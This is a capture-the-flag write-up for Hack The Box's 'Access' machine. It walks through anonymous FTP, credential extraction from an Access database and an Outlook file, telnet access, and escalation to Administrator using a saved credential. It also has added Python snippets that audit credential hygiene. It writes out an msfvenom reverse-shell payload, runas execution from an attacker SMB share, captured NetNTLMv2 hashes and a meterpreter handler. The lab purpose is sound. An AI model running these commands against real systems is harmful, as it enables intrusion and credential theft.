About

Access is an “easy” difficulty machine that highlights how machines associated with the physical security of an environment may not themselves be secure. It also highlights how accessible FTP/file shares often lead to a foothold or to lateral movement, and it teaches techniques for identifying and exploiting saved credentials.

Enumeration

Running the script portscan.sh reveals three attack vectors: FTP, Telnet and HTTP.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ sudo portscan.sh 10.129.237.83

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ cat PortScan\(10.129.237.83\)

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

FTP

As nmap revealed that anonymous FTP login is enabled, I’ll perform anonymous login to enumerate the FTP server.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp ftp://10.129.237.83 -aA
Connected to 10.129.237.83.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
230 User logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> dir
200 EPRT command successful.
125 Data connection already open; Transfer starting.
08-23-18  09:16PM       <DIR>          Backups
08-24-18  10:00PM       <DIR>          Engineer

After some enumeration, I’m able to find 2 files Backups/backup.mdb and Engineer/Access Control.zip which I’ll download for further enumeration.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp ftp://10.129.237.83/Backups/backup.mdb -aAV

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ ftp 'ftp://10.129.237.83/Engineer/Access Control.zip' -aAV

First, checking the file backup.mdb reveals that it is a Microsoft Access Database file.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ file backup.mdb
backup.mdb: Microsoft Access Database

From the database file, I’m able to extract 3 credentials admin:admin, engineer:access4u@security and backup_admin:admin.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ mdb-tables backup.mdb --single-column
acc_antiback
acc_door
acc_firstopen
acc_firstopen_emp
acc_holidays
acc_interlock
acc_levelset
acc_levelset_door_group
acc_linkageio
acc_map
acc_mapdoorpos
acc_morecardempgroup
acc_morecardgroup
acc_timeseg
acc_wiegandfmt
ACGroup
acholiday
ACTimeZones
action_log
AlarmLog
areaadmin
att_attreport
att_waitforprocessdata
attcalclog
attexception
AuditedExc
auth_group_permissions
auth_message
auth_permission
auth_user
auth_user_groups
auth_user_user_permissions
base_additiondata
base_appoption
base_basecode
base_datatranslation
base_operatortemplate
base_personaloption
base_strresource
base_strtranslation
base_systemoption
CHECKEXACT
CHECKINOUT
dbbackuplog
DEPARTMENTS
deptadmin
DeptUsedSchs
devcmds
devcmds_bak
django_content_type
django_session
EmOpLog
empitemdefine
EXCNOTES
FaceTemp
iclock_dstime
iclock_oplog
iclock_testdata
iclock_testdata_admin_area
iclock_testdata_admin_dept
LeaveClass
LeaveClass1
Machines
NUM_RUN
NUM_RUN_DEIL
operatecmds
personnel_area
personnel_cardtype
personnel_empchange
personnel_leavelog
ReportItem
SchClass
SECURITYDETAILS
ServerLog
SHIFT
TBKEY
TBSMSALLOT
TBSMSINFO
TEMPLATE
USER_OF_RUN
USER_SPEDAY
UserACMachines
UserACPrivilege
USERINFO
userinfo_attarea
UsersMachines
UserUpdates
worktable_groupmsg
worktable_instantmsg
worktable_msgtype
worktable_usrmsg
ZKAttendanceMonthStatistics
acc_levelset_emp
acc_morecardset
ACUnlockComb
AttParam
auth_group
AUTHDEVICE
base_option
dbapp_viewmodel
FingerVein
devlog
HOLIDAYS
personnel_issuecard
SystemLog
USER_TEMP_SCH
UserUsedSClasses
acc_monitor_log
OfflinePermitGroups
OfflinePermitUsers
OfflinePermitDoors
LossCard
TmpPermitGroups
TmpPermitUsers
TmpPermitDoors
ParamSet
acc_reader
acc_auxiliary
STD_WiegandFmt
CustomReport
ReportField
BioTemplate
FaceTempEx
FingerVeinEx
TEMPLATEEx

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ mdb-export backup.mdb auth_user
id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,

Next, I’ll look at the file Access Control.zip. When trying to unzip it, I’m prompted for a password. Since the file was in the Engineer directory, I’ll test the password access4u@security, which is the password for the user engineer found in backup.mdb. Fortunately, I’m able to unzip the file with the password access4u@security, which indicates password reuse.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ 7z x Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs 11th Gen Intel(R) Core(TM) i5-11500 @ 2.70GHz (A0671),ASM,AES-NI)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
Everything is Ok

Size:       271360
Compressed: 10870
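The findings above (plaintext storage, admin:admin, the same password on two accounts, and an account password reused to protect the zip) are exactly what a credential-hygiene check over an exported backup should flag. The following is an added example, not part of the original writeup: it parses the mdb-export output shown earlier (embedded as sample input) and reports those problems; the mapping of artifact name to secret is an assumption supplied for illustration.

```python
import csv
import io
from collections import defaultdict

# The auth_user rows exported from backup.mdb on the page, embedded here as sample input.
AUTH_USER_EXPORT = """id,username,password,Status,last_login,RoleID,Remark
25,"admin","admin",1,"08/23/18 21:11:47",26,
27,"engineer","access4u@security",1,"08/23/18 21:13:36",26,
28,"backup_admin","admin",1,"08/23/18 21:14:02",26,
"""

def parse_auth_user_export(text):
    """Parse an mdb-export CSV dump into a list of {column: value} dicts."""
    return list(csv.DictReader(io.StringIO(text)))

def looks_hashed(value):
    """Heuristic: hex digests of common lengths or crypt-style '$id$...' strings."""
    hex_lengths = {32, 40, 56, 64, 96, 128}
    if value.startswith("$"):
        return True
    try:
        int(value, 16)
    except ValueError:
        return False
    return len(value) in hex_lengths

def audit_credentials(rows, other_secrets=None):
    """Return (finding, detail) tuples for credential-hygiene problems in the export.

    other_secrets maps an artifact name to the secret that opens it (an assumption for
    this example), so reuse of a database password outside the database is reported too.
    """
    findings, by_password = [], defaultdict(list)
    for row in rows:
        user, pwd = row["username"], row["password"]
        if not looks_hashed(pwd):
            findings.append(("plaintext_password", user))
        if pwd.lower() == user.lower():
            findings.append(("password_equals_username", user))
        by_password[pwd].append(user)
    for pwd, users in by_password.items():
        if len(users) > 1:
            findings.append(("shared_password", ",".join(sorted(users))))
    for artifact, secret in (other_secrets or {}).items():
        for user in by_password.get(secret, []):
            findings.append(("reused_outside_db", f"{user}->{artifact}"))
    return findings
```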

By checking the file Access Control.pst, I’m able to discover that it is a Microsoft Outlook Personal Storage file.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2e

Using readpst, I’m able to process the file Access Control.pst to find a credential security:4Cc3ssC0ntr0ller.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ readpst Access\ Control.pst -e
Opening PST file and indexes...
Processing Folder "Deleted Items"
	"Access Control" - 2 items done, 0 items skipped.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ head Access\ Control/2.eml -n 30
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="--boundary-LibPST-iamunique-2002325818_-_-"


----boundary-LibPST-iamunique-2002325818_-_-
Content-Type: multipart/alternative;
	boundary="alt---boundary-LibPST-iamunique-2002325818_-_-"

--alt---boundary-LibPST-iamunique-2002325818_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,



The password for the “security” account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John

Finally, using telnet with the retrieved credential security:4Cc3ssC0ntr0ller, I’m able to gain a shell as the user access\security.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ telnet 10.129.237.83
Trying 10.129.237.83...
Connected to 10.129.237.83.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: security
password:

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>whoami
access\security

Privilege Escalation

After some enumeration, I find that AppLocker is in place and that many of the common AppLocker bypass techniques are also blocked. After some more enumeration, I find a credential for ACCESS\Administrator stored in the Windows Vault. Since the user Administrator is often not subject to AppLocker restrictions, I’ll be able to bypass AppLocker by running exploits as Administrator using the stored credential.

C:\Users\security>cmdkey /list

Currently stored credentials:

    Target: Domain:interactive=ACCESS\Administrator
                                                       Type: Domain Password
    User: ACCESS\Administrator
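From a defender's side, the entry above is the finding to hunt for: an interactive domain logon credential for a privileged account saved in a low-privileged user's profile, which is what runas /savecred consumes. The following is an added example (not from the original writeup) that parses cmdkey /list output and flags such entries; the sample output embeds the page's entry plus a constructed generic credential, and the set of privileged account names is an assumption.

```python
# Constructed sample of `cmdkey /list` output: the first entry is the one on the page,
# the second is a made-up generic (non-logon) credential used to show the filter.
CMDKEY_OUTPUT = """
Currently stored credentials:

    Target: Domain:interactive=ACCESS\\Administrator
    Type: Domain Password
    User: ACCESS\\Administrator

    Target: LegacyGeneric:target=git:https://example.invalid
    Type: Generic
    User: devuser
    Local machine persistence
"""

# Assumption for this example: account names treated as high-value.
PRIVILEGED_ACCOUNTS = {"administrator"}

def parse_cmdkey_list(text):
    """Turn cmdkey /list output into a list of {target, type, user} dicts."""
    entries, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Target:"):
            current = {"target": line.split(":", 1)[1].strip(), "type": "", "user": ""}
            entries.append(current)
        elif current is not None and line.startswith("Type:"):
            current["type"] = line.split(":", 1)[1].strip()
        elif current is not None and line.startswith("User:"):
            current["user"] = line.split(":", 1)[1].strip()
    return entries

def runas_usable(entry):
    """Only saved interactive domain logons can be consumed by runas /savecred."""
    return (entry["type"] == "Domain Password"
            and entry["target"].lower().startswith("domain:interactive="))

def risky_saved_credentials(entries):
    """Return (target, user) for runas-usable credentials of privileged accounts.

    Such an entry lets anything running in the user's session start programs as that
    account, so it should be removed (cmdkey /delete) and the password rotated.
    """
    risky = []
    for entry in entries:
        account = entry["user"].split("\\")[-1].lower()
        if runas_usable(entry) and account in PRIVILEGED_ACCOUNTS:
            risky.append((entry["target"], entry["user"]))
    return risky
```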

To do so, I’ll first create an EXE reverse shell payload using msfvenom.

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe -o exploit.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: exploit.exe

Next, by launching the payload from a UNC path as the Administrator, I’m able to gain a shell as the user ACCESS\Administrator.

C:\Users\security>runas /user:ACCESS\Administrator /savecred \\10.10.16.9\pwn\exploit.exe

┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ smbserver.py pwn . -ip 10.10.16.9
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.129.237.83,49158)
[*] AUTHENTICATE_MESSAGE (ACCESS\security,ACCESS)
[*] User ACCESS\security authenticated successfully
[*] security::ACCESS:aaaaaaaaaaaaaaaa:806e581431e67b4ca12058437f30ca4f:010100000000000080cefe5e5405da01b4768b773be26692000000000100100072005900650072006500590053004b000300100072005900650072006500590053004b0002001000590052004a006300570062007200490004001000590052004a00630057006200720049000700080080cefe5e5405da0106000400020000000800300030000000000000000000000000200000140cad2e5dafce43cc3321b0d055324527e1dacee359b58fdea9d5b7904921f60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] AUTHENTICATE_MESSAGE (ACCESS\Administrator,ACCESS)
[*] User ACCESS\Administrator authenticated successfully
[*] Administrator::ACCESS:aaaaaaaaaaaaaaaa:7d87a184283ed3fe2bebe29aa7355346:010100000000000080cefe5e5405da013f26392412069218000000000100100072005900650072006500590053004b000300100072005900650072006500590053004b0002001000590052004a006300570062007200490004001000590052004a00630057006200720049000700080080cefe5e5405da0106000400020000000800300030000000000000000000000000300000140cad2e5dafce43cc3321b0d055324527e1dacee359b58fdea9d5b7904921f60a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000
[*] AUTHENTICATE_MESSAGE (\,ACCESS)
[*] User ACCESS\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:PWN)
[*] Handle: The NETBIOS connection with the remote host timed out.
[*] Closing down connection (10.129.237.83,49158)
[*] Remaining connections []
┌──(m0nk3y@kali)-[~/HTB/Access]
└─$ msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Sending stage (175686 bytes) to 10.129.237.83
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.237.83:49159) at 2023-10-22 21:58:27 -0400

meterpreter > getuid
Server username: ACCESS\Administrator

Post Exploitation

With the shell acquired, I’m able to read the flags user.txt and root.txt.

meterpreter > cat 'C:\Users\security\Desktop\user.txt'
abcc1effe0143332dc7b9f09793539e7

meterpreter > cat 'C:\Users\Administrator\Desktop\root.txt'
405cd3a5c69056eebd26027d76078a87